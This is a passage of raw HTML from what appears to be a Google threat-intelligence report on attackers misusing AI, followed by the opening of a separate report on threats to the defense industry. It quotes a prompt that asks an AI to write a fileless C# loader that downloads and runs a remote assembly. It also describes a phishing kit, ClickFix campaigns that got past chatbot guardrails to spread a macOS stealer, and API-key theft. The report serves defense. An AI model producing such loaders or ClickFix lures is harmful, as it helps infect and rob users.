style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 10: Example of a hard-coded prompt</span></div></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">Write a complete, self-contained C# program with a public class named 'Stage2'. It must have a static Main method. This method must use 'System.Net.WebClient' to download the contents of the URL \"\" into a byte array. After downloading, it must load this byte array into memory as a .NET assembly using 'System.Reflection.Assembly.Load'. Finally, it must execute the entry point of the newly loaded assembly. The program must not write any files to disk and must not have any other methods or classes.</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 11: Example of a hard-coded prompt</span></p> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">AI-Generated Phishing Kit: COINBAIT</span></h4> <p><span style="vertical-align: baseline;">In November 2025, GTIG identified </span><a href="https://www.virustotal.com/gui/collection/0bfe8d133848734d730a219abd09a8404f47e4%20b446974be7ddcd288255ef1bb0" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">COINBAIT</span></a><span style="vertical-align: baseline;">, a phishing kit, whose construction was likely accelerated by AI code generation tools, masquerading as a major cryptocurrency exchange for credential harvesting. Based on direct infrastructure overlaps and the use of attributed domains, we assess with high confidence that a portion of this activity overlaps with UNC5356, a financially motivated threat cluster that makes use of SMS- and phone-based phishing campaigns to target clients of financial organizations, cryptocurrency-related companies, and various other popular businesses and services. </span></p> <p><span style="vertical-align: baseline;">An examination of the malware samples indicates the kit was built using the AI-powered platform Lovable AI based on the use of the lovableSupabase client and lovable.app for image hosting.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">By hosting content on a legitimate, trusted service, the actor increases the likelihood of bypassing network security filters that would otherwise block the suspicious primary domain.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The phishing kit was wrapped in a full React Single-Page Application (SPA) with complex state management and routing. This complexity is indicative of code generated from high-level prompts (e.g., "Create a Coinbase-style UI for wallet recovery") using a framework like Lovable AI. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Another key indicator of LLM use is the presence of verbose, developer-oriented logging messages directly within the malware's source code. These messages—consistently prefixed with "? Analytics:"—provide a real-time trace of the kit's malicious tracking and data exfiltration activities and serve as a unique fingerprint for this code family.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><div align="center"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Phase</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Log Message Examples</strong></p> </td> </tr> <tr> <td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Initialization</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">? Analytics: Initializing...</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">? Analytics: Session created in database:</span></p> </td> </tr> <tr> <td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Credential Capture</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">? Analytics: Tracking password attempt:</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">? Analytics: Password attempt tracked to database:</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Admin Panel Fetching</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">? RecoveryPhrasesCard: Fetching recovery phrases directly from database...</span></p> </td> </tr> <tr> <td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Routing/Access Control</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">? RouteGuard: Admin redirected session, allowing free access to</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">? RouteGuard: Session approved by admin, allowing free access to</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Error Handling</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">? Analytics: Database error for password attempt:</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: Example console.log messages extracted from COINBAIT source code</span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">We also observed the group employ infrastructure and evasion tactics for their operations, including proxying phishing domains through Cloudflare to obscure the attacker IP addresses and  hotlinking image assets in phishing pages directly from Lovable AI. </span></p> <p><span style="vertical-align: baseline;">The introduction of the COINBAIT phishing kit would represent an evolution in UNC5356's tooling, demonstrating a shift toward modern web frameworks and legitimate cloud services to enhance the sophistication and scalability of their social engineering campaigns. However, there is at least some evidence to suggest that COINBAIT may be a service provided to multiple disparate threat actors.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Mitigations</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="font-style: italic; vertical-align: baseline;">Organizations should strongly consider implementing network detection rules to alert on traffic to backend-as-a-service (BaaS) platforms like Supabase that originate from uncategorized or newly registered domains. Additionally, organizations should consider enhancing security awareness training to warn users against entering sensitive data into website forms. This includes passwords, multifactor authentication (MFA) backup codes, and account recovery keys.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Cyber Crime Use of AI Tooling</span></h3> <p><span style="vertical-align: baseline;">In addition to misusing existing AI-enabled tools and services across the industry, there is a growing interest and marketplace for AI tools and services purpose-built to enable illicit activities. Tools and services offered via underground forums can enable low-level actors to augment the frequency, scope, efficacy, and complexity of their intrusions despite their limited technical acumen and financial resources. While financially motivated threat actors continue experimenting, they have not yet made breakthroughs in developing AI tooling. </span></p> <h4><span style="vertical-align: baseline;">Threat Actors Leveraging AI Services for Social Engineering in 'ClickFix' Campaigns</span></h4> <p><span style="vertical-align: baseline;">While not a new malware technique, GTIG observed instances in which threat actors abused the public's trust in generative AI services to attempt to deliver malware. GTIG identified a novel campaign where threat actors are leveraging the public sharing feature of generative AI services, including Gemini, to host deceptive social engineering content. This activity, first observed in early December 2025, attempts to trick users into installing malware via the well-established "ClickFix" technique. This ClickFix technique is used to socially engineer users to copy and paste a malicious command into the command terminal.</span></p> <p><span style="vertical-align: baseline;">The threat actors were able to bypass safety guardrails to stage malicious instructions on how to perform a variety of tasks on macOS, ultimately distributing variants of </span><a href="https://www.virustotal.com/gui/collection/dfd93a4d19773adacd2140f49ef12a7f33613f560cc7609638becac2d9c86900/iocs" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">ATOMIC</span></a><span style="vertical-align: baseline;">, an information stealer that targets the macOS environment and has the ability to collect browser data, cryptocurrency wallets, system information, and files in the Desktop and Documents folders. The threat actors behind this campaign have used a wide range of AI chat platforms to host their malicious instructions, including ChatGPT, CoPilot, DeepSeek, Gemini, and Grok.</span></p> <p><span style="vertical-align: baseline;">The campaign's objective is to lure users, primarily those on Windows and macOS systems, into manually executing malicious commands. The attack chain operates as follows:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A threat actor first crafts a malicious command line that, if copied and pasted by a victim, would infect them with malware.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Next, the threat actor manipulates the AI to create realistic-looking instructions to fix a common computer issue (e.g., clearing disk space or installing software), but gives the malicious command line to the AI as the solution.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Gemini and other AI tools allow a user to create a shareable link to specific chat transcripts so a specific AI response can be shared with others. The attacker now has a link to a malicious ClickFix landing page hosted on the AI service's infrastructure.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The attacker purchases malicious advertisements or otherwise directs unsuspecting victims to the publicly shared chat transcript.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The victim is fooled by the AI chat transcript and follows the instructions to copy a seemingly legitimate command-line script and paste it directly into their system's terminal. This command will download and install malware. Since the action is user initiated and uses built-in system commands, it may be harder for security software to detect and block.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gtig-ai-threat-tracker-feb26-fig12.max-1000x1000.jpg" alt="ClickFix attack chain"> </a> <figcaption class="article-image__caption "><p data-block-key="rvlva">Figure 12: ClickFix attack chain</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">There were different lures generated for Windows and MacOS, and the use of malicious advertising techniques for payload distribution suggests the targeting is likely fairly broad and opportunistic. </span></p> <p><span style="vertical-align: baseline;">This approach allows threat actors to leverage trusted domains to host their initial stage of instruction, relying on social engineering to carry out the final, highly destructive step of execution. While a widely used approach, this marks the first time GTIG observed the public sharing feature of AI services being abused as trusted domains.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Mitigations</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="font-style: italic; vertical-align: baseline;">In partnership with Ads and Safe Browsing, GTIG is taking actions to both block the malicious content and restrict the ability to promote these types of AI-generated responses.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Observations from the Underground Marketplace: Threat Actors Abusing AI API Keys</span></h4> <p><span style="vertical-align: baseline;">While legitimate AI services remain popular tools for threat actors, there is an enduring market for AI services specifically designed to support malicious activity. Current observations of English- and Russian-language underground forums indicates there is a persistent appetite for AI-enabled tools and services, which aligns </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span style="text-decoration: underline; vertical-align: baseline;">with our previous assessment of these platforms</span></a><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;">However, threat actors struggle to develop custom models and instead rely on mature models such as Gemini. For example, "Xanthorox" is an underground toolkit that advertises itself as a custom AI for cyber offensive purposes, such as autonomous code generation of malware and development of phishing campaigns. The model was advertised as a "bespoke, privacy preserving self-hosted AI" designed to autonomously generate malware, ransomware, and phishing content. However, our investigation revealed that Xanthorox is not a custom AI but actually powered by several third-party and commercial AI products, including Gemini.</span></p> <p><span style="vertical-align: baseline;">This setup leverages a key abuse vector: the integration of multiple open-source AI products—specifically Crush, Hexstrike AI, LibreChat-AI, and Open WebUI—opportunistically leveraged via Model Context Protocol (MCP) servers to build an agentic AI service upon commercial models.</span></p> <p><span style="vertical-align: baseline;">In order to misuse LLMs services for malicious operations in a scalable way, threat actors need API keys and resources that enable LLM integrations. This creates a hijacking risk for organizations with substantial cloud resources and AI resources. </span></p> <p><span style="vertical-align: baseline;">In addition, vulnerable open-source AI tools are commonly exploited to steal AI API keys from users, thus facilitating a thriving black market for unauthorized API resale and key hijacking, enabling widespread abuse, and incurring costs for the affected users. For example, the One API and New API platform, popular with users facing country-level censorship, are regularly harvested for API keys by attackers, exploiting publicly known vulnerabilities such as default credentials, insecure authentication, lack of rate limiting, XSS flaws, and API key exposure via insecure API endpoints.</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Mitigations</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="font-style: italic; vertical-align: baseline;">The activity was identified and successfully mitigated. Google Trust &amp; Safety took action to disable and mitigate all identified accounts and AI Studio projects associated with Xanthorox. These observations also underscore a broader security risk where vulnerable open-source AI tools are actively exploited to steal users' AI API keys, thus facilitating a black market for unauthorized API resale and key hijacking, enabling widespread abuse, and incurring costs for the affected users.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Building AI Safely and Responsibly</span><strong style="vertical-align: baseline;"> </strong></h3> <p><span style="vertical-align: baseline;">We believe our approach to AI must be both bold and responsible. That means developing AI in a way that maximizes the positive benefits to society while addressing the challenges. Guided by our </span><a href="https://ai.google/responsibility/responsible-ai-practices/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AI Principles</span></a><span style="vertical-align: baseline;">, Google designs AI systems with robust security measures and strong safety guardrails, and we continuously test the security and safety of our models to improve them. </span></p> <p><span style="vertical-align: baseline;">Our </span><a href="https://gemini.google/policy-guidelines/?hl=en" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">policy guidelines</span></a><span style="vertical-align: baseline;"> and prohibited use </span><a href="https://policies.google.com/terms/generative-ai/use-policy" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">policies</span></a><span style="vertical-align: baseline;"> prioritize safety and responsible use of Google's generative AI tools. Google's </span><a href="https://transparency.google/our-approach/our-policy-process/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">policy development process</span></a><span style="vertical-align: baseline;"> includes identifying emerging trends, thinking end-to-end, and designing for safety. We continuously enhance safeguards in our products to offer scaled protections to users across the globe.  </span></p> <p><span style="vertical-align: baseline;">At Google, </span><a href="https://cloud.google.com/transform/how-google-does-it-threat-intelligence-uncover-track-cybercrime"><span style="text-decoration: underline; vertical-align: baseline;">we leverage threat intelligence to disrupt</span></a><span style="vertical-align: baseline;"> adversary operations. We investigate abuse of our products, services, users, and platforms, including malicious cyber activities by government-backed threat actors, and work with law enforcement when appropriate. Moreover, our learnings from countering malicious activities are fed back into our product development to improve safety and security for our AI models. These changes, which can be made to both our classifiers and at the model level, are essential to maintaining agility in our defenses and preventing further misuse.</span></p> <p><span style="vertical-align: baseline;">Google DeepMind also develops threat models for generative AI to identify potential vulnerabilities and creates new evaluation and training techniques to address misuse. In conjunction with this research, Google DeepMind has shared how they're actively deploying defenses in AI systems, along with measurement and monitoring tools, including a robust evaluation framework that can automatically red team an AI vulnerability to indirect prompt injection attacks. </span></p> <p><span style="vertical-align: baseline;">Our AI development and Trust &amp; Safety teams also work closely with our threat intelligence, security, and modelling teams to stem misuse.</span></p> <p><span style="vertical-align: baseline;">The potential of AI, especially generative AI, is immense. As innovation moves forward, the industry needs security standards for building and deploying AI responsibly. That's why we introduced the </span><a href="https://blog.google/technology/safety-security/introducing-googles-secure-ai-framework/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Secure AI Framework (SAIF)</span></a><span style="vertical-align: baseline;">, a conceptual framework to secure AI systems. We've shared a comprehensive </span><a href="https://ai.google.dev/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">toolkit for developers</span></a><span style="vertical-align: baseline;"> with </span><a href="https://ai.google.dev/responsible" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">resources and guidance</span></a><span style="vertical-align: baseline;"> for designing, building, and evaluating AI models responsibly. We've also shared best practices for </span><a href="https://ai.google.dev/responsible/docs/safeguards" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">implementing safeguards</span></a><span style="vertical-align: baseline;">, </span><a href="https://ai.google.dev/responsible/docs/evaluation#red-teaming" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">evaluating model safety</span></a><span style="vertical-align: baseline;">, </span><a href="https://blog.google/technology/safety-security/googles-ai-red-team-the-ethical-hackers-making-ai-safer/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">red teaming</span></a><span style="vertical-align: baseline;"> to test and secure AI systems, and our comprehensive </span><a href="https://security.googleblog.com/2025/06/mitigating-prompt-injection-attacks.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">prompt injection approach</span></a><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Working closely with industry partners is crucial to building stronger protections for all of our users. To that end, we're fortunate to have strong collaborative partnerships with numerous researchers, and we appreciate the work of these researchers and others in the community to help us red team and refine our defenses.</span></p> <p><span style="vertical-align: baseline;">Google also continuously invests in AI research, helping to ensure </span><a href="https://ai.google/static/documents/ai-responsibility-update-published-february-2025.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">AI is built responsibly</span></a><span style="vertical-align: baseline;">, and that we're leveraging its potential to automatically find risks. Last year, we introduced </span><a href="https://blog.google/technology/safety-security/cybersecurity-updates-summer-2025/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Big Sleep</span></a><span style="vertical-align: baseline;">, an AI agent developed by Google DeepMind and Google Project Zero, that actively searches and finds unknown security vulnerabilities in software. Big Sleep has since found its first real-world security vulnerability and assisted in finding a vulnerability that was imminently going to be used by threat actors, which GTIG was able to cut off beforehand. We're also experimenting with AI to not only find vulnerabilities, but also patch them. We recently introduced </span><a href="https://deepmind.google/discover/blog/introducing-codemender-an-ai-agent-for-code-security/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CodeMender</span></a><span style="vertical-align: baseline;">, an experimental AI-powered agent using the advanced reasoning capabilities of our Gemini models to automatically fix critical code vulnerabilities. </span></p> <h3><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h3> <p><span style="vertical-align: baseline;">To assist the wider community in hunting and identifying activity outlined in this blog post, we have included IOCs in a free </span><a href="https://www.virustotal.com/gui/collection/e72e3856e4c780078ba59c0a639b915fcab473e88f4701e16b36024d3d8c1578/summary" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">GTI Collection</span></a><span style="vertical-align: baseline;"> for registered users.</span></p> <h3><span style="vertical-align: baseline;">About the Authors</span></h3> <p><span style="font-style: italic; vertical-align: baseline;">Google Threat Intelligence Group focuses on identifying, analyzing, mitigating, and eliminating entire classes of cyber threats against Alphabet, our users, and our customers. Our work includes countering threats from government-backed actors, targeted zero-day exploits, coordinated information operations (IO), and serious cyber crime networks. We apply our intelligence to improve Google's defenses and protect our users and customers.</span></p></div>Thu, 12 Feb 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use/Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/threats-to-defense-industrial-base/<div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction </span></h3> <p><span style="vertical-align: baseline;">In modern warfare, the front lines are no longer confined to the battlefield; they extend directly into the servers and supply chains of the industry that safeguards the nation. Today, the defense sector faces a relentless barrage of cyber operations conducted by state-sponsored actors and criminal groups alike. In recent years, Google Threat Intelligence Group (GTIG) has observed several distinct areas of focus in adversarial targeting of the defense industrial base (DIB). While not exhaustive of all actors and means, some of the more prominent themes in the landscape today include: </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Consistent effort has been dedicated to targeting defense entities fielding technologies on the battlefield in the Russia-Ukraine War. As next-generation capabilities are being operationalized in this environment, Russia-nexus threat actors and hacktivists are seeking to</span><strong style="vertical-align: baseline;"> compromise defense contractors</strong><span style="vertical-align: baseline;"> alongside military assets and systems, with a focus on organizations involved with unmanned aircraft systems (UAS). This includes targeting defense companies directly, </span><span style="vertical-align: baseline;">using themes mimicking their</span><span style="vertical-align: baseline;"> products and systems in intrusions against military organizations and personnel. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Across global defense and aerospace firms, the </span><strong style="vertical-align: baseline;">direct targeting of employees and exploitation of the hiring process</strong><span style="vertical-align: baseline;"> has emerged as a key theme. From the North Korean IT worker threat, to the spoofing of recruitment portals by Iranian espionage actors, to the direct targeting of defense contractors' personal emails, GTIG continues to observe a multifaceted threat landscape that centers around personnel, and often in a manner that evades traditional enterprise security visibility.    </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Among state-sponsored </span><strong style="vertical-align: baseline;">cyber espionage</strong><span style="vertical-align: baseline;"> intrusions over the last two years analysed by GTIG, threat activity from </span><strong style="vertical-align: baseline;">China-nexus groups continues to represent by volume the most active</strong><span style="vertical-align: baseline;"> threat to entities in the defense industrial base. While these intrusions continue to leverage an array of tactics, campaigns from actors such as </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations"><span style="text-decoration: underline; vertical-align: baseline;">UNC3886</span></a><span style="vertical-align: baseline;"> and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span style="text-decoration: underline; vertical-align: baseline;">UNC5221</span></a><span style="vertical-align: baseline;"> highlight how the targeting of edge devices and appliances as a means of initial access has increased as a tactic by China-nexus threat actors, and poses a significant risk to the defense and aerospace sector. In comparison to the Russia-nexus threats observed on the battlefield in Ukraine, these could support more preparatory access or R&amp;D theft missions. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Lastly, contemporary national security strategy relies heavily on a secure supply chain. Since 2020, </span><strong style="vertical-align: baseline;">manufacturing has been the most represented sector across data leak sites </strong><span style="vertical-align: baseline;">(DLS) that GTIG tracks associated with ransomware and extortive activity. While dedicated defense and aerospace organizations represent a small fraction of similar activity, the broader manufacturing sector includes many companies that provide dual-use components for defense applications, and this statistic highlights the cyber risk the industrial base supply chain is exposed to. The ability to surge defense components in a wartime environment can be impacted, even when these intrusions are limited to IT networks. Additionally, the global resurgence of hacktivism, and actors carrying out hack and leak operations, DDoS attacks, or other forms of disruption, has impacted the defense industrial base. </span></p> </li> </ul> <p><span style="vertical-align: baseline;">Across these themes we see further areas of commonality. Many of the chief state-sponsors of cyber espionage and hacktivist actors have shown an interest in autonomous vehicles and drones, as these platforms play an increasing role in modern warfare. Further, the “evasion of detection” trend first highlighted in the </span><a href="https://services.google.com/fh/files/misc/m-trends-2024.pdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant M-Trends 2024 report</span></a><span style="vertical-align: baseline;"> continues, as actors focus on single endpoints and individuals, or carry out intrusions in a manner that seeks to avoid endpoint detection and response (EDR) tools altogether. All of this contributes to a contested and complex environment that challenges traditional detection strategies, requiring everyone from security practitioners to policymakers to think creatively in countering these threats. </span></p> <h3><span style="vertical-align: baseline;">1. Longstanding Russian Targeting of Critical and Emerging Defense Technologies in Ukraine and Beyond </span></h3> <p><span style="vertical-align: baseline;">Russian espionage actors have demonstrated a longstanding interest in Western defense entities. While Russia's full-scale invasion of Ukraine began in February 2022, the Russian government has long viewed the conflict as an extension of a broader campaign against Western encroachment into its sphere of influence, and has accordingly targeted both Ukrainian and Western military and defense-related entities via kinetic and cyber operations. </span></p> <p><span style="vertical-align: baseline;">Russia's use of cyber operations </span><a href="https://www.rusi.org/explore-our-research/publications/commentary/russias-cyber-campaign-shifts-ukraines-frontlines" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">in support of military 